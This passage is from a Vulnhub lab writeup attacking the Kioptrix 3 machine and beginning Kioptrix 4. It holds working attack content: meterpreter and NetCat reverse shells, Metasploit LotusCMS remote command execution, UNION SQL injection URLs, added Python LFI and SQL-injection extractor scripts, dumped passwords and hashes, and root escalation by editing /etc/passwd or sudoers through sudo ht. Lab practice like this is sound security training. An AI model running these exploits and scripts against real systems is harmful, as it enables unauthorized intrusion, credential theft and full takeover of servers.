</pre><p>Requesting that URL runs the payload, and a session comes back to the handler:</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">msf > use multi/handler
msf exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.43.177
LHOST => 192.168.43.177
msf exploit(multi/handler) > set LPORT 443
LPORT => 443
msf exploit(multi/handler) > run
 
[*] Started reverse TCP handler on 192.168.43.177:443 
[*] Sending stage (37775 bytes) to 192.168.43.158
[*] Meterpreter session 1 opened (192.168.43.177:443 -> 192.168.43.158:51226) at 2018-05-08 12:53:09 -0400
 
meterpreter > ls
Listing: /home/www/kioptrix3.com
================================
 
Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
40777/rwxrwxrwx   4096   dir   2011-04-15 09:21:17 -0400  cache
40777/rwxrwxrwx   4096   dir   2011-04-14 12:24:17 -0400  core
40777/rwxrwxrwx   4096   dir   2011-04-14 12:24:17 -0400  data
100644/rw-r--r--  23126  fil   2011-04-14 12:23:13 -0400  favicon.ico
40755/rwxr-xr-x   4096   dir   2011-04-14 11:32:31 -0400  gallery
100644/rw-r--r--  26430  fil   2011-04-14 12:23:13 -0400  gnu-lgpl.txt
100644/rw-r--r--  399    fil   2011-04-14 12:23:13 -0400  index.php
40777/rwxrwxrwx   4096   dir   2011-04-14 12:24:17 -0400  modules
40777/rwxrwxrwx   4096   dir   2011-04-14 12:24:17 -0400  style
100644/rw-r--r--  243    fil   2011-04-14 12:23:13 -0400  update.php
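</pre><p>To make the null-byte truncation used above concrete, the following is an added Python example; it is not code from the writeup or from LotusCMS. It models what the page demonstrates: an <code>include()</code> that appends a fixed suffix to the <code>system</code> parameter, which is why plain traversal to <code>/etc/passwd</code> fails and the <code>%00.</code> variant succeeds on PHP 5.2. The include base directory, the <code>.php</code> suffix and the fake filesystem are assumptions made for the simulation; the probe itself only needs a <code>fetch</code> callable, so it can be pointed at a real request function.</p>

```python
import posixpath
import re
from urllib.parse import quote

# Constructed stand-in for the target's filesystem. The include base directory and the
# ".php" suffix are assumptions about how LotusCMS resolves ?system=, not facts from the page.
INCLUDE_BASE = "/home/www/kioptrix3.com/core/lib/systems/"
FAKE_FS = {
    "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\n"
                   "www-data:x:33:33:www-data:/var/www:/bin/sh\n",
    INCLUDE_BASE + "Blog.php": "blog module source",
}
PASSWD_RE = re.compile(r"^root:x:0:0:", re.M)


def php52_include_path(system_value):
    """Model of include(INCLUDE_BASE . $_GET['system'] . '.php') on PHP 5.2.
    The path reaches the C runtime as a NUL-terminated string, so a NUL in the
    parameter silently drops everything after it, including the appended '.php'.
    PHP 5.3.4 and later refuse paths containing NUL instead."""
    full = INCLUDE_BASE + system_value + ".php"
    full = full.split("\x00", 1)[0]
    return posixpath.normpath(full)


def simulated_fetch(system_value):
    """Fake HTTP layer: returns what index.php would render for a decoded ?system= value."""
    path = php52_include_path(system_value)
    return FAKE_FS.get(path, "Warning: include(%s): failed to open stream" % path)


def build_payloads(target="/etc/passwd", max_depth=8):
    """Yield (label, decoded value): plain traversal, then the null-byte variant from the writeup."""
    for depth in range(1, max_depth + 1):
        traversal = "../" * depth + target.lstrip("/")
        yield "plain", traversal
        yield "nullbyte", traversal + "\x00."


def probe_lfi(fetch, target="/etc/passwd", max_depth=8):
    """Return (label, url-encoded value) of the first payload that leaks the target, or None."""
    for label, value in build_payloads(target, max_depth):
        if PASSWD_RE.search(fetch(value)):
            return label, quote(value, safe="/")
    return None


def safe_include_path(system_value):
    """Hardened resolver: only a bare module name is accepted, so neither traversal
    nor NUL bytes ever reach the filesystem."""
    if not re.fullmatch(r"[A-Za-z0-9_]+", system_value):
        return None
    return INCLUDE_BASE + system_value + ".php"


if __name__ == "__main__":
    print(probe_lfi(simulated_fetch))
```

<p>Against the simulated target, <code>probe_lfi(simulated_fetch)</code> returns <code>('nullbyte', '../../../../../../etc/passwd%00.')</code>: every plain payload ends up as <code>.../etc/passwd.php</code> and misses, and the depth that works depends only on how far the include base sits below <code>/</code>, which is why the writeup simply stacks more <code>../</code> than needed. <code>safe_include_path</code> is the fix: accept only a bare module name.</p><pre class="md-fences mock-cm md-end-block" lang="">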
</pre><p>The session runs as the web server user, so privileges are limited and many commands cannot be executed.</p><h3><a name='header-n10259' class='md-header-anchor '></a>SQL injection with sqlmap</h3><p>Some of the site's links 302-redirect to the hostname <code>kioptrix3.com</code>. Map that name to the target in <code>/etc/hosts</code> on the attacking machine:</p><pre class="md-fences mock-cm md-end-block" lang="">192.168.43.158  kioptrix3.com
</pre><p>The writeup then runs <code>service networking restart</code>; it does no harm, but changes to <code>/etc/hosts</code> take effect immediately and no restart is needed. The gallery page is injectable: <code>kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos</code></p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_7.png' alt='' referrerPolicy='no-referrer' /></p><p>Confirm it with <code>sqlmap</code> first: the <code>id</code> parameter is vulnerable to error-based injection.</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_8.png' alt='' referrerPolicy='no-referrer' /></p><p>Look for the admin account credentials:</p><pre class="md-fences mock-cm md-end-block" lang="">Database: gallery
Table: dev_accounts
[2 entries]
+----+------------+---------------------------------------------+
| id | username   | password                                    |
+----+------------+---------------------------------------------+
| 1  | dreg       | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r)   |
| 2  | loneferret | 5badcaf789d3d1d09794d8f021f40f0e (starwars) |
+----+------------+---------------------------------------------+
</pre><p>These look like admin credentials (sqlmap cracked the unsalted MD5 hashes to <code>Mast3r</code> and <code>starwars</code>), but they do not work on the CMS login page:</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_6.png' alt='' referrerPolicy='no-referrer' /></p><p>There is a second login at <code>http://kioptrix3.com/gallery/gadmin/</code>, and the database has a second user table:</p><pre class="md-fences mock-cm md-end-block" lang="">Database: gallery
Table: gallarific_users
[2 entries]
+----------+----------+
| username | password |
+----------+----------+
| admin    | n0t7t1k4 |
+----------+----------+
 
</pre><p><code>admin</code> / <code>n0t7t1k4</code> logs in there. Although the database user is <code>root</code> with DBA privileges, the web root's absolute path is unknown at this point, so sqlmap cannot simply write a shell to disk: <code>--os-shell</code> and <code>--file-write</code> need a directory the DBMS can write to and the web server serves.</p><h3><a name='header-n10291' class='md-header-anchor '></a>Manual SQL injection</h3><pre class="md-fences mock-cm md-end-block" lang="">http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,2,3,4,5,6#
</pre><p>The query has 6 columns: a UNION is accepted only when both SELECTs return the same number of columns.</p><pre class="md-fences mock-cm md-end-block" lang="">http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,version(),database(),4,5,6#
</pre><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_9.png' alt='' referrerPolicy='no-referrer' /></p><p>Columns 2 and 3 are echoed in the page, which yields the MySQL version and the current database.</p><pre class="md-fences mock-cm md-end-block" lang="">http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,group_concat(table_name),3,4,5,6%20from%20information_schema.tables%20where%20table_schema%20=%20database()#
</pre><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_10.png' alt='' referrerPolicy='no-referrer' /></p><p>All table names in the current database.</p><pre class="md-fences mock-cm md-end-block" lang="">http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,group_concat(column_name),3,4,5,6%20FROM%20information_schema.columns%20WHERE%20table_name%20=0x6465765f6163636f756e7473#
</pre><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_11.png' alt='' referrerPolicy='no-referrer' /></p><p>The columns of <code>dev_accounts</code>. The table name is passed as the hex literal <code>0x6465765f6163636f756e7473</code>, which MySQL treats as the string <code>'dev_accounts'</code>, so the payload needs no quote characters. Finally dump the username and password pairs (<code>0x3a</code> is <code>:</code>):</p><pre class="md-fences mock-cm md-end-block" lang="">http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,group_concat(username,0x3a,password),3,4,5,6%20FROM%20dev_accounts#
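</pre><p>The manual sequence above can be scripted. The following is an added Python example, not code from the writeup: a small union-based extractor that finds the column count, finds which column is echoed, and pulls <code>version()</code>, <code>database()</code>, the table and column names and finally the <code>username:password</code> pairs, using the same payload shapes as above, with <code>hex_literal()</code> producing values such as <code>0x6465765f6163636f756e7473</code> so that no quotes are needed. The target is replaced by a constructed SQLite stand-in for <code>gallery.php</code> and the <code>gallery</code> database (the <code>dev_accounts</code> rows are the ones dumped above; the <code>photos</code> table and the version string are invented), with <code>version()</code>, <code>database()</code> and <code>concat()</code> registered to imitate MySQL. Against a live host, <code>fetch</code> would be a function that requests <code>gallery.php?id=</code> and returns the response body.</p>

```python
import re
import sqlite3


def build_fake_gallery():
    """Constructed stand-in for the gallery database. The real target is MySQL; SQLite is
    used so the example runs offline, with version(), database() and concat() registered
    to mimic MySQL. The dev_accounts rows come from the writeup; the photos table is invented."""
    conn = sqlite3.connect(":memory:")
    conn.execute("ATTACH ':memory:' AS information_schema")
    conn.executescript("""
        CREATE TABLE photos(photoid INTEGER, title TEXT, descr TEXT, tags TEXT, votes INTEGER, hits INTEGER);
        INSERT INTO photos VALUES (1, 'Photo one', 'first upload', 'test', 0, 0);
        CREATE TABLE dev_accounts(id INTEGER, username TEXT, password TEXT);
        INSERT INTO dev_accounts VALUES (1, 'dreg', '0d3eccfb887aabd50f243b3f155c0f85');
        INSERT INTO dev_accounts VALUES (2, 'loneferret', '5badcaf789d3d1d09794d8f021f40f0e');
        CREATE TABLE information_schema.tables(table_schema TEXT, table_name TEXT);
        INSERT INTO information_schema.tables VALUES ('gallery', 'dev_accounts'), ('gallery', 'photos');
        CREATE TABLE information_schema.columns(table_name TEXT, column_name TEXT);
        INSERT INTO information_schema.columns VALUES
            ('dev_accounts', 'id'), ('dev_accounts', 'username'), ('dev_accounts', 'password');
    """)
    conn.create_function("version", 0, lambda: "5.0.51a-3ubuntu5.4")   # assumed version string
    conn.create_function("database", 0, lambda: "gallery")
    conn.create_function("concat", -1, lambda *parts: "".join(str(p) for p in parts))
    return conn


def fake_gallery_page(conn, id_value):
    """Simulates gallery.php: the id parameter is concatenated unquoted into the query and
    columns 2 and 3 of every result row are echoed into the page."""
    sql = "SELECT * FROM photos WHERE photoid = " + id_value
    sql = sql.split("#", 1)[0]                          # MySQL end-of-line comment
    sql = re.sub(r"0x([0-9a-fA-F]+)",                   # MySQL hex literal in string context
                 lambda m: "'" + bytes.fromhex(m.group(1)).decode() + "'", sql)
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.Error as err:
        return "Database error: %s" % err
    return "\n".join("title: %s | description: %s" % (row[1], row[2]) for row in rows)


def hex_literal(text):
    """Encode a string as a MySQL hex literal so the payload needs no quote characters."""
    return "0x" + text.encode().hex()


class UnionInjector:
    def __init__(self, fetch):
        self.fetch = fetch          # fetch(id_value) -> page body

    def find_column_count(self, max_cols=12):
        """Grow UNION SELECT 1,2,...,n until the DBMS stops complaining about column counts."""
        for n in range(1, max_cols + 1):
            cols = ",".join(str(i) for i in range(1, n + 1))
            if "error" not in self.fetch("1 union select %s#" % cols).lower():
                return n
        raise RuntimeError("no column count up to %d accepted" % max_cols)

    def find_reflected_column(self, ncols):
        """Put a unique marker in each column in turn and see which one the page echoes."""
        for i in range(1, ncols + 1):
            marker = "mrk%dmrk" % i
            cols = [str(c) for c in range(1, ncols + 1)]
            cols[i - 1] = hex_literal(marker)
            if marker in self.fetch("1 union select %s#" % ",".join(cols)):
                return i
        raise RuntimeError("no column is reflected")

    def extract(self, expr, ncols, col, from_clause=""):
        """Evaluate expr in the reflected column, fenced by markers so it can be cut out."""
        cols = [str(c) for c in range(1, ncols + 1)]
        cols[col - 1] = "concat(%s,%s,%s)" % (hex_literal("[["), expr, hex_literal("]]"))
        body = self.fetch("1 union select %s %s#" % (",".join(cols), from_clause))
        m = re.search(r"\[\[(.*?)\]\]", body, re.S)
        return m.group(1) if m else None


def dump_dev_accounts(fetch):
    """The writeup's manual steps end to end: column count, reflected column, version and
    database, table names, columns of dev_accounts, then username:password pairs."""
    inj = UnionInjector(fetch)
    ncols = inj.find_column_count()
    col = inj.find_reflected_column(ncols)
    info = {
        "version": inj.extract("version()", ncols, col),
        "database": inj.extract("database()", ncols, col),
        "tables": inj.extract("group_concat(table_name)", ncols, col,
                              "from information_schema.tables where table_schema = database()"),
        "columns": inj.extract("group_concat(column_name)", ncols, col,
                               "from information_schema.columns where table_name = " + hex_literal("dev_accounts")),
        "creds": inj.extract("group_concat(concat(username,0x3a,password))", ncols, col,
                             "from dev_accounts"),
    }
    return ncols, col, info
```

<p>Two things to adapt on a real target: the <code>"error"</code> substring test in <code>find_column_count</code> is specific to the simulated page (key it on the DBMS error text or on a response-length difference instead), and <code>group_concat</code> output is capped by <code>group_concat_max_len</code> (1024 by default), so large tables have to be paged with <code>LIMIT</code>.</p><pre class="md-fences mock-cm md-end-block" lang="">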
</pre><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_12.png' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n10315' class='md-header-anchor '></a>Lotus CMS vulnerabilities</h3><pre class="md-fences mock-cm md-end-block" lang="">root@kali:~# searchsploit Lotus CMS
------------------------------------------------------- ----------------------------------------
 Exploit Title                                         |  Path
                                                       | (/usr/share/exploitdb/)
------------------------------------------------------- ----------------------------------------
Lotus CMS Fraise 3.0 - Local File Inclusion / Remote C | exploits/php/webapps/15964.py
Lotus Core CMS 1.0.1 - Remote File Inclusion           | exploits/php/webapps/5866.txt
LotusCMS 3.0 - 'eval()' Remote Command Execution (Meta | exploits/php/remote/18565.rb
LotusCMS 3.0.3 - Multiple Vulnerabilities              | exploits/php/webapps/16982.txt
------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
</pre><p>The results include a local file inclusion and a remote command execution. The LFI is the one found earlier; the searchsploit script for it (<code>15964.py</code>) did not work in this test. The <code>LotusCMS 3.0 - 'eval()' Remote Command Execution</code> entry is a Metasploit module (<code>.rb</code>), so look it up in msfconsole:</p><pre class="md-fences mock-cm md-end-block" lang="">msf > search LotusCMS
 
Matching Modules
================
 
   Name                              Disclosure Date  Rank       Description
   ----                              ---------------  ----       -----------
   exploit/multi/http/lcms_php_exec  2011-03-03       excellent  LotusCMS 3.0 eval() Remote Command Execution
 
</pre><p>Exploit it with the module. Two details matter in the run below: the module's <code>URI</code> option defaults to <code>/lcms/</code> and has to be set to <code>/</code> for this target, and the first attempt fails with <code>unreachable</code> only because <code>RHOST</code> was mistyped as <code>192.168.43.58</code> instead of <code>192.168.43.158</code>. The payload is a bind shell, so no listener is needed on the attacking side:</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">msf > use exploit/multi/http/lcms_php_exec 
msf exploit(multi/http/lcms_php_exec) > show options 
 
Module options (exploit/multi/http/lcms_php_exec):
 
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                     yes       The target address
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   URI      /lcms/           yes       URI
   VHOST                     no        HTTP server virtual host
 
 
Exploit target:
 
   Id  Name
   --  ----
   0   Automatic LotusCMS 3.0
 
 
msf exploit(multi/http/lcms_php_exec) > set RHOST 192.168.43.58
RHOST => 192.168.43.58
msf exploit(multi/http/lcms_php_exec) > set PAYLOAD generic/shell_bind_tcp 
PAYLOAD => generic/shell_bind_tcp
msf exploit(multi/http/lcms_php_exec) > set URI /
URi => /
msf exploit(multi/http/lcms_php_exec) > show options 
 
Module options (exploit/multi/http/lcms_php_exec):
 
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST    192.168.43.58    yes       The target address
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   URI      /                yes       URI
   VHOST                     no        HTTP server virtual host
 
 
Payload options (generic/shell_bind_tcp):
 
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  192.168.43.58    no        The target address
 
 
Exploit target:
 
   Id  Name
   --  ----
   0   Automatic LotusCMS 3.0
 
 
msf exploit(multi/http/lcms_php_exec) > run 
 
[*] Started bind handler
[-] Exploit failed [unreachable]: Rex::HostUnreachable The host (192.168.43.58:80) was unreachable.
[*] Exploit completed, but no session was created.
msf exploit(multi/http/lcms_php_exec) > set RHOST 192.168.43.158
RHOST => 192.168.43.158
msf exploit(multi/http/lcms_php_exec) > run 
 
[*] Started bind handler
[*] Using found page param: /index.php?page=index
[*] Sending exploit ...
[*] Command shell session 1 opened (192.168.43.177:44505 -> 192.168.43.158:4444) at 2018-05-08 10:02:56 -0400
 
whoami
www-data
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
ls
cache
core
data
favicon.ico
gallery
gnu-lgpl.txt
index.php
modules
style
update.php
pwd 
/home/www/kioptrix3.com
</pre><p>Changing into <code>gallery</code> with <code>cd</code> did not work from this shell, but <code>ls -l gallery</code> lists its contents:</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">ls -l gallery
total 156
drwxr-xr-x 2 root root  4096 Apr 12  2011 BACK
-rw-r--r-- 1 root root  3573 Oct 10  2009 db.sql
-rw-r--r-- 1 root root   252 Apr 12  2011 g.php
drwxr-xr-x 3 root root  4096 Apr 12  2011 gadmin
-rw-r--r-- 1 root root   214 Apr 12  2011 gallery.php
-rw-r--r-- 1 root root  1440 Apr 14  2011 gconfig.php
-rw-r--r-- 1 root root   297 Apr 12  2011 gfooter.php
-rw-r--r-- 1 root root 38771 Apr 12  2011 gfunctions.php
-rw-r--r-- 1 root root  1009 Apr 12  2011 gheader.php
-rw-r--r-- 1 root root   249 Apr 12  2011 index.php
-rw-r--r-- 1 root root 10340 Apr 12  2011 install.BAK
-rw-r--r-- 1 root root   212 Apr 12  2011 login.php
-rw-r--r-- 1 root root   213 Apr 12  2011 logout.php
-rw-r--r-- 1 root root   249 Apr 12  2011 p.php
drwxrwxrwx 2 root root  4096 Apr 12  2011 photos
-rw-r--r-- 1 root root   213 Apr 12  2011 photos.php
-rw-r--r-- 1 root root   219 Apr 12  2011 post_comment.php
-rw-r--r-- 1 root root   214 Apr 12  2011 profile.php
-rw-r--r-- 1 root root    87 Oct 10  2009 readme.html
-rw-r--r-- 1 root root   213 Apr 12  2011 recent.php
-rw-r--r-- 1 root root   215 Apr 12  2011 register.php
drwxr-xr-x 2 root root  4096 Apr 13  2011 scopbin
-rw-r--r-- 1 root root   213 Apr 12  2011 search.php
-rw-r--r-- 1 root root   216 Apr 12  2011 slideshow.php
-rw-r--r-- 1 root root   211 Apr 12  2011 tags.php
drwxr-xr-x 6 root root  4096 Apr 12  2011 themes
-rw-r--r-- 1 root root    56 Oct 10  2009 version.txt
-rw-r--r-- 1 root root   211 Apr 12  2011 vote.php
</pre><p><code>gconfig.php</code> is the gallery's configuration file; <code>cat</code> it for the database credentials. The application connects as the MySQL <code>root</code> account, which is why the injection runs with DBA privileges:</p><pre class="md-fences mock-cm md-end-block" lang="">  $GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";
 
    $GLOBALS["gallarific_mysql_server"] = "localhost";
    $GLOBALS["gallarific_mysql_database"] = "gallery";
    $GLOBALS["gallarific_mysql_username"] = "root";
    $GLOBALS["gallarific_mysql_password"] = "fuckeyou";
 
</pre><h3><a name='header-n10339' class='md-header-anchor '></a>lotusRCE.sh</h3><p>An alternative to the Metasploit module is Hood3dRob1n's standalone script, which checks for the injection and then plants a reverse shell:</p><pre class="md-fences mock-cm md-end-block" lang="">wget https://raw.githubusercontent.com/Hood3dRob1n/LotusCMS-Exploit/master/lotusRCE.sh
</pre><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~# chmod +x lotusRCE.sh
root@kali:~# ./lotusRCE.sh 192.168.43.158
 
Path found, now to check for vuln....
 
</html>Hood3dRob1n
Regex found, site is vulnerable to PHP Code Injection!
 
About to try and inject reverse shell....
what IP to use?
192.168.43.177
What PORT?
2333
 
OK, open your local listener and choose the method for back connect: 
1) NetCat -e        3) NetCat Backpipe  5) Exit
2) NetCat /dev/tcp  4) NetCat FIFO
#? 1
 
</pre><pre class="md-fences mock-cm md-end-block" lang="">root@kali:/tmp# nc -lvp 2333
listening on [any] 2333 ...
connect to [192.168.43.177] from kioptrix3.com [192.168.43.158] 56259
whoami
www-data
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
 
</pre><h2><a name='header-n10344' class='md-header-anchor '></a>Privilege escalation</h2><p>Try the accounts dumped from <code>dev_accounts</code> over SSH (cracked passwords in parentheses):</p><pre class="md-fences mock-cm md-end-block" lang="">Database: gallery
Table: dev_accounts
[2 entries]
+----+------------+---------------------------------------------+
| id | username   | password                                    |
+----+------------+---------------------------------------------+
| 1  | dreg       | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r)   |
| 2  | loneferret | 5badcaf789d3d1d09794d8f021f40f0e (starwars) |
+----+------------+---------------------------------------------+
</pre><p>The first account (<code>dreg</code>) logs in but offers nothing useful for escalation. Log in as the second, <code>loneferret</code>:</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~# ssh loneferret@192.168.43.158
loneferret@192.168.43.158's password: 
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686
 
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
 
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
 
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106
loneferret@Kioptrix3:~$ ls
checksec.sh  CompanyPolicy.README
</pre><p>The home directory contains a <code>CompanyPolicy.README</code> file:</p><pre class="md-fences mock-cm md-end-block" lang="">
loneferret@Kioptrix3:~$ cat CompanyPolicy.README 
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.
 
DG
CEO
</pre><p>The note tells employees to edit, create and view files with <code>sudo ht</code>, i.e. <code>loneferret</code> is allowed to run the <code>ht</code> editor as root (<code>sudo -l</code> would show the rule). Try it from the Kali SSH session:</p><pre class="md-fences mock-cm md-end-block" lang="">loneferret@Kioptrix3:~$ sudo ht
Error opening terminal: xterm-256color.
</pre><p><code>ht</code> fails because the target has no terminfo entry for <code>xterm-256color</code>, the <code>TERM</code> value Kali's terminal advertises. Setting a terminal type the old system knows (<code>export TERM=xterm</code>) fixes this; the writeup instead connected with <code>xshell</code>, which also works.</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_13.png' alt='' referrerPolicy='no-referrer' /></p><p>Press <code>F3</code> to open a file and enter <code>/etc/passwd</code> or <code>/etc/sudoers</code>: since <code>ht</code> runs as root, either can be edited.</p><p>One option is to change the current user's UID and GID in <code>/etc/passwd</code> to <code>0</code>, which makes the account equivalent to <code>root</code>.
<img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_14.png' alt='' referrerPolicy='no-referrer' /></p><p>The other is to give the current user the same rights as <code>root</code> in <code>/etc/sudoers</code> (a line such as <code>loneferret ALL=(ALL) ALL</code>).
<img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_15.png' alt='' referrerPolicy='no-referrer' /></p><p>Log in again over SSH:</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~# ssh loneferret@192.168.43.158
loneferret@192.168.43.158's password: 
Last login: Tue May  8 19:27:01 2018 from uknow-pc
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686
 
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
 
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
 
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
root@Kioptrix3:~# id
uid=0(root) gid=0(root) groups=0(root),100(users)
root@Kioptrix3:~# whoami
root
</pre><p>The session is now <code>root</code>.</p><h2><a name='header-n10381' class='md-header-anchor '></a>Summary</h2><p>This exercise took a while and ran into several dead ends. First, <code>phpmyadmin</code> was found and writing a shell through the MySQL general query log was attempted, but the server's variables contain no <code>general_log</code>: that variable was introduced in MySQL 5.1, and this Ubuntu 8.04 target runs the 5.0 series.</p><p>Second, the SQL injection that <code>sqlmap</code> found runs as MySQL <code>root</code>, so <code>--os-shell</code> was tried with the absolute path learned from the remote command execution, yet the write still failed, apparently a directory-permission problem.</p><p><code>INTO OUTFILE</code> from <code>phpmyadmin</code> fails as well with <code>#1 - Can't create/write to file</code>. The file is created by the <code>mysqld</code> process under its own user, not by the web server, so the target directory must be writable by that user, and the directory targeted here evidently was not.</p><p>Finally, the file inclusion plus admin-panel upload was added: including an uploaded image that carries PHP code gives a shell. Limited in practice, but still a nice chain.</p><p>There were more approaches worth trying than the lab environment allowed, but this and the previous <code>vulnhub</code> machines taught a lot, especially about privilege escalation.</p><p>Odd and dated as these environments are, they filled in a good deal of previously missing <code>linux</code> knowledge along the way.</p><h1><a name='header-n10396' class='md-header-anchor '></a>Section 16: Vulnhub penetration testing practice - Kioptrix 4</h1><hr /><p>title: Vulnhub penetration testing practice - Kioptrix 4
date: 2018-05-17 13:46:30
tags:</p><h2><a name='header-n10399' class='md-header-anchor '></a>Author: Ukonw</h2><h3><a name='header-n10405' class='md-header-anchor '></a>Information gathering</h3><p>Port scan with <code>nmap</code>.</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~# nmap -sS -A 10.32.58.187
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-17 01:57 EDT
Nmap scan report for 10.32.58.187
Host is up (0.00037s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_  2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 00:0C:29:38:2D:6F (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
Host script results:
|_clock-skew: mean: 10h00m00s, deviation: 2h49m43s, median: 7h59m59s
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.28a)
|   Computer name: Kioptrix4
|   NetBIOS computer name: 
|   Domain name: localdomain
|   FQDN: Kioptrix4.localdomain
|_  System time: 2018-05-17T09:58:07-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
 
TRACEROUTE
HOP RTT     ADDRESS
1   0.37 ms 10.32.58.187
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.81 seconds
</pre><p>The scan shows the following open ports:</p><ul><li>22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)</li><li>80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)</li><li>139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)</li><li>445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)</li></ul><p>The same Apache/PHP stack as Kioptrix 3 (Ubuntu 8.04), plus Samba 3.0.28a, which this writeup does not need. Browse to the web service on port 80.</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix4_1.png' alt='' referrerPolicy='no-referrer' /></p><p>The classic authentication bypass <code>'or 1=1#</code> fails, and the weak password <code>admin:admin</code> is wrong too.</p><p>Submitting <code>admin</code> with a single quote (<code>'</code>) as the password produces a database error that discloses the script path <code>/var/www/checklogin.php</code>.</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix4_2.png' alt='' referrerPolicy='no-referrer' /></p><p>So the login form has a POST-based SQL injection.</p><h2><a name='header-n10433' class='md-header-anchor '></a>Exploitation</h2><h3><a name='header-n10434' class='md-header-anchor '></a>SQL injection with sqlmap</h3><p><code>sqlmap -u http://10.32.58.187/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" -p mypassword --current-user --current-db --is-dba</code></p><p>When sqlmap asks whether to follow the <code>302</code> redirect, answer <code>n</code>.</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: 